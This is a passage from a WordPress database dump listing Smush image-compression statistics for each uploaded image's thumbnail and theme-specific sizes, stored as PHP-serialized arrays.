"stdClass\":5:{s:7:\"percent\";d:40.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:7757;s:11:\"size_before\";i:18969;s:10:\"size_after\";i:11212;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:27.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:5372;s:11:\"size_before\";i:19567;s:10:\"size_after\";i:14195;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4369,1813,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.850800621631861986315925605595111846923828125;s:5:\"bytes\";i:79803;s:11:\"size_before\";i:258674;s:10:\"size_after\";i:178871;s:4:\"time\";d:1.42999999999999971578290569595992565155029296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.13000000000000255795384873636066913604736328125;s:5:\"bytes\";i:3433;s:11:\"size_before\";i:9773;s:10:\"size_after\";i:6340;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:9076;s:11:\"size_before\";i:23314;s:10:\"size_after\";i:14238;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:17888;s:11:\"size_before\";i:59063;s:10:\"size_after\";i:41175;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:15568;s:11:\"size_before\";i:71457;s:10:\"size_after\";i:55889;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.659999999999996589394868351519107818603515625;s:5:\"bytes\";i:7432;s:11:\"size_before\";i:19732;s:10:\"size_after\";i:12300;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:40.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:13294;s:11:\"size_before\";i:32880;s:10:\"size_after\";i:19586;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.879999999999999005240169935859739780426025390625;s:5:\"bytes\";i:13112;s:11:\"size_before\";i:42455;s:10:\"size_after\";i:29343;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4370,1802,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.61036381691793817338975713937543332576751708984375;s:5:\"bytes\";i:4215;s:11:\"size_before\";i:55385;s:10:\"size_after\";i:51170;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:494;s:11:\"size_before\";i:7021;s:10:\"size_after\";i:6527;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:888;s:11:\"size_before\";i:12058;s:10:\"size_after\";i:11170;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:846;s:11:\"size_before\";i:11125;s:10:\"size_after\";i:10279;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.88999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:1987;s:11:\"size_before\";i:25181;s:10:\"size_after\";i:23194;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4371,1801,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.0425912591913775173679823637939989566802978515625;s:5:\"bytes\";i:3686;s:11:\"size_before\";i:45831;s:10:\"size_after\";i:42145;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:484;s:11:\"size_before\";i:6190;s:10:\"size_after\";i:5706;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5;s:5:\"bytes\";i:839;s:11:\"size_before\";i:9867;s:10:\"size_after\";i:9028;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8100000000000004973799150320701301097869873046875;s:5:\"bytes\";i:777;s:11:\"size_before\";i:8818;s:10:\"size_after\";i:8041;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1586;s:11:\"size_before\";i:20956;s:10:\"size_after\";i:19370;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4372,1800,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.2071675891525757151612197048962116241455078125;s:5:\"bytes\";i:3643;s:11:\"size_before\";i:39567;s:10:\"size_after\";i:35924;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.230000000000000426325641456060111522674560546875;s:5:\"bytes\";i:456;s:11:\"size_before\";i:4938;s:10:\"size_after\";i:4482;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:797;s:11:\"size_before\";i:8528;s:10:\"size_after\";i:7731;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:764;s:11:\"size_before\";i:7673;s:10:\"size_after\";i:6909;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1626;s:11:\"size_before\";i:18428;s:10:\"size_after\";i:16802;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4373,1777,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.739292364990689065962214954197406768798828125;s:5:\"bytes\";i:67840;s:11:\"size_before\";i:343680;s:10:\"size_after\";i:275840;s:4:\"time\";d:1.6500000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:3221;s:11:\"size_before\";i:11133;s:10:\"size_after\";i:7912;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.35000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8667;s:11:\"size_before\";i:26795;s:10:\"size_after\";i:18128;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.120000000000000994759830064140260219573974609375;s:5:\"bytes\";i:15498;s:11:\"size_before\";i:81074;s:10:\"size_after\";i:65576;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:6308;s:11:\"size_before\";i:98575;s:10:\"size_after\";i:92267;s:4:\"time\";d:0.520000000000000017763568394002504646778106689453125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:7394;s:11:\"size_before\";i:23503;s:10:\"size_after\";i:16109;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.25;s:5:\"bytes\";i:13066;s:11:\"size_before\";i:43200;s:10:\"size_after\";i:30134;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:13686;s:11:\"size_before\";i:59400;s:10:\"size_after\";i:45714;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}}}'),(4374,1776,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.822789121743966234134859405457973480224609375;s:5:\"bytes\";i:77698;s:11:\"size_before\";i:223124;s:10:\"size_after\";i:145426;s:4:\"time\";d:1.229999999999999982236431605997495353221893310546875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.46000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3275;s:11:\"size_before\";i:10088;s:10:\"size_after\";i:6813;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:9542;s:11:\"size_before\";i:25017;s:10:\"size_after\";i:15475;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.090000000000003410605131648480892181396484375;s:5:\"bytes\";i:17236;s:11:\"size_before\";i:53704;s:10:\"size_after\";i:36468;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.219999999999998863131622783839702606201171875;s:5:\"bytes\";i:11303;s:11:\"size_before\";i:38687;s:10:\"size_after\";i:27384;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:7688;s:11:\"size_before\";i:21182;s:10:\"size_after\";i:13494;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:40.24000000000000198951966012828052043914794921875;s:5:\"bytes\";i:13679;s:11:\"size_before\";i:33990;s:10:\"size_after\";i:20311;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.02000000000000312638803734444081783294677734375;s:5:\"bytes\";i:14975;s:11:\"size_before\";i:40456;s:10:\"size_after\";i:25481;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4375,1775,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:28.508305175347825155540704145096242427825927734375;s:5:\"bytes\";i:58131;s:11:\"size_before\";i:203909;s:10:\"size_after\";i:145778;s:4:\"time\";d:1.5800000000000000710542735760100185871124267578125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.050000000000000710542735760100185871124267578125;s:5:\"bytes\";i:3377;s:11:\"size_before\";i:11238;s:10:\"size_after\";i:7861;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.97999999999999687361196265555918216705322265625;s:5:\"bytes\";i:8389;s:11:\"size_before\";i:24689;s:10:\"size_after\";i:16300;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.239999999999998436805981327779591083526611328125;s:5:\"bytes\";i:10805;s:11:\"size_before\";i:46499;s:10:\"size_after\";i:35694;s:4:\"time\";d:0.35999999999999998667732370449812151491641998291015625;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:2966;s:11:\"size_before\";i:33098;s:10:\"size_after\";i:30132;s:4:\"time\";d:0.4899999999999999911182158029987476766109466552734375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.590000000000003410605131648480892181396484375;s:5:\"bytes\";i:7097;s:11:\"size_before\";i:21127;s:10:\"size_after\";i:14030;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.0499999999999971578290569595992565155029296875;s:5:\"bytes\";i:13288;s:11:\"size_before\";i:32368;s:10:\"size_after\";i:19080;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.99000000000000198951966012828052043914794921875;s:5:\"bytes\";i:12209;s:11:\"size_before\";i:34890;s:10:\"size_after\";i:22681;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}}}'),(4376,1774,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:35.05513523549343091190166887827217578887939453125;s:5:\"bytes\";i:52867;s:11:\"size_before\";i:150811;s:10:\"size_after\";i:97944;s:4:\"time\";d:1.4299999999999999378275106209912337362766265869140625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.590000000000003410605131648480892181396484375;s:5:\"bytes\";i:2642;s:11:\"size_before\";i:7638;s:10:\"size_after\";i:4996;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.5799999999999982946974341757595539093017578125;s:5:\"bytes\";i:7172;s:11:\"size_before\";i:18588;s:10:\"size_after\";i:11416;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:12253;s:11:\"size_before\";i:35991;s:10:\"size_after\";i:23738;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:7062;s:11:\"size_before\";i:27139;s:10:\"size_after\";i:20077;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:5632;s:11:\"size_before\";i:15052;s:10:\"size_after\";i:9420;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:9574;s:11:\"size_before\";i:22060;s:10:\"size_after\";i:12486;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.0499999999999971578290569595992565155029296875;s:5:\"bytes\";i:8532;s:11:\"size_before\";i:24343;s:10:\"size_after\";i:15811;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4377,1773,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.13613235657964128932917446945793926715850830078125;s:5:\"bytes\";i:23873;s:11:\"size_before\";i:464805;s:10:\"size_after\";i:440932;s:4:\"time\";d:1.609999999999999875655021241982467472553253173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:2100;s:11:\"size_before\";i:12478;s:10:\"size_after\";i:10378;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:7294;s:11:\"size_before\";i:31859;s:10:\"size_after\";i:24565;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:110378;s:10:\"size_after\";i:110378;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:146711;s:10:\"size_after\";i:146711;s:4:\"time\";d:0.429999999999999993338661852249060757458209991455078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.03999999999999914734871708787977695465087890625;s:5:\"bytes\";i:5650;s:11:\"size_before\";i:28194;s:10:\"size_after\";i:22544;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:7035;s:11:\"size_before\";i:55396;s:10:\"size_after\";i:48361;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.25;s:5:\"bytes\";i:1794;s:11:\"size_before\";i:79789;s:10:\"size_after\";i:77995;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4378,1772,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:24.288695408194580949157170834951102733612060546875;s:5:\"bytes\";i:55403;s:11:\"size_before\";i:228102;s:10:\"size_after\";i:172699;s:4:\"time\";d:1.5599999999999998312461002569762058556079864501953125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:3122;s:11:\"size_before\";i:10010;s:10:\"size_after\";i:6888;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.25999999999999801048033987171947956085205078125;s:5:\"bytes\";i:9129;s:11:\"size_before\";i:25177;s:10:\"size_after\";i:16048;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:10562;s:11:\"size_before\";i:51731;s:10:\"size_after\";i:41169;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.37999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:3502;s:11:\"size_before\";i:47422;s:10:\"size_after\";i:43920;s:4:\"time\";d:0.429999999999999993338661852249060757458209991455078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.22999999999999687361196265555918216705322265625;s:5:\"bytes\";i:7647;s:11:\"size_before\";i:21704;s:10:\"size_after\";i:14057;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.39999999999999857891452847979962825775146484375;s:5:\"bytes\";i:12142;s:11:\"size_before\";i:33354;s:10:\"size_after\";i:21212;s:4:\"time\";d:0.2099999999999999922284388276239042170345783233642578125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:24.030000000000001136868377216160297393798828125;s:5:\"bytes\";i:9299;s:11:\"size_before\";i:38704;s:10:\"size_after\";i:29405;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4379,1771,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:30.957054679491374571398409898392856121063232421875;s:5:\"bytes\";i:56774;s:11:\"size_before\";i:183396;s:10:\"size_after\";i:126622;s:4:\"time\";d:1.4699999999999999733546474089962430298328399658203125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2437;s:11:\"size_before\";i:8237;s:10:\"size_after\";i:5800;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.840000000000003410605131648480892181396484375;s:5:\"bytes\";i:7973;s:11:\"size_before\";i:21642;s:10:\"size_after\";i:13669;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:13227;s:11:\"size_before\";i:43851;s:10:\"size_after\";i:30624;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.059999999999998721023075631819665431976318359375;s:5:\"bytes\";i:6242;s:11:\"size_before\";i:34556;s:10:\"size_after\";i:28314;s:4:\"time\";d:0.450000000000000011102230246251565404236316680908203125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.72999999999999687361196265555918216705322265625;s:5:\"bytes\";i:6428;s:11:\"size_before\";i:17991;s:10:\"size_after\";i:11563;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.00999999999999801048033987171947956085205078125;s:5:\"bytes\";i:10366;s:11:\"size_before\";i:26574;s:10:\"size_after\";i:16208;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:10101;s:11:\"size_before\";i:30545;s:10:\"size_after\";i:20444;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}}}'),(4380,1770,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.199665048681481493986211717128753662109375;s:5:\"bytes\";i:60241;s:11:\"size_before\";i:176145;s:10:\"size_after\";i:115904;s:4:\"time\";d:1.25;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.159999999999996589394868351519107818603515625;s:5:\"bytes\";i:2688;s:11:\"size_before\";i:8106;s:10:\"size_after\";i:5418;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.27000000000000312638803734444081783294677734375;s:5:\"bytes\";i:7639;s:11:\"size_before\";i:19960;s:10:\"size_after\";i:12321;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:13832;s:11:\"size_before\";i:42200;s:10:\"size_after\";i:28368;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:23.489999999999998436805981327779591083526611328125;s:5:\"bytes\";i:7896;s:11:\"size_before\";i:33614;s:10:\"size_after\";i:25718;s:4:\"time\";d:0.40000000000000002220446049250313080847263336181640625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.409999999999996589394868351519107818603515625;s:5:\"bytes\";i:6111;s:11:\"size_before\";i:16335;s:10:\"size_after\";i:10224;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.280000000000001136868377216160297393798828125;s:5:\"bytes\";i:11214;s:11:\"size_before\";i:25908;s:10:\"size_after\";i:14694;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:36.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:10861;s:11:\"size_before\";i:30022;s:10:\"size_after\";i:19161;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4381,1769,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:32.15609348914858145462858374230563640594482421875;s:5:\"bytes\";i:77046;s:11:\"size_before\";i:239600;s:10:\"size_after\";i:162554;s:4:\"time\";d:1.3899999999999999023003738329862244427204132080078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:3072;s:11:\"size_before\";i:10187;s:10:\"size_after\";i:7115;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.77000000000000312638803734444081783294677734375;s:5:\"bytes\";i:8909;s:11:\"size_before\";i:25621;s:10:\"size_after\";i:16712;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:17055;s:11:\"size_before\";i:57278;s:10:\"size_after\";i:40223;s:4:\"time\";d:0.320000000000000006661338147750939242541790008544921875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:12502;s:11:\"size_before\";i:46765;s:10:\"size_after\";i:34263;s:4:\"time\";d:0.34999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:33.71000000000000085265128291212022304534912109375;s:5:\"bytes\";i:7405;s:11:\"size_before\";i:21968;s:10:\"size_after\";i:14563;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:37.7000000000000028421709430404007434844970703125;s:5:\"bytes\";i:13292;s:11:\"size_before\";i:35259;s:10:\"size_after\";i:21967;s:4:\"time\";d:0.179999999999999993338661852249060757458209991455078125;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:14811;s:11:\"size_before\";i:42522;s:10:\"size_after\";i:27711;s:4:\"time\";d:0.200000000000000011102230246251565404236316680908203125;}}}'),(4382,1768,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:35.4239003578709770181376370601356029510498046875;s:5:\"bytes\";i:73150;s:11:\"size_before\";i:206499;s:10:\"size_after\";i:133349;s:4:\"time\";d:1.5100000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.61999999999999744204615126363933086395263671875;s:5:\"bytes\";i:3006;s:11:\"size_before\";i:9214;s:10:\"size_after\";i:6208;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:38.43999999999999772626324556767940521240234375;s:5:\"bytes\";i: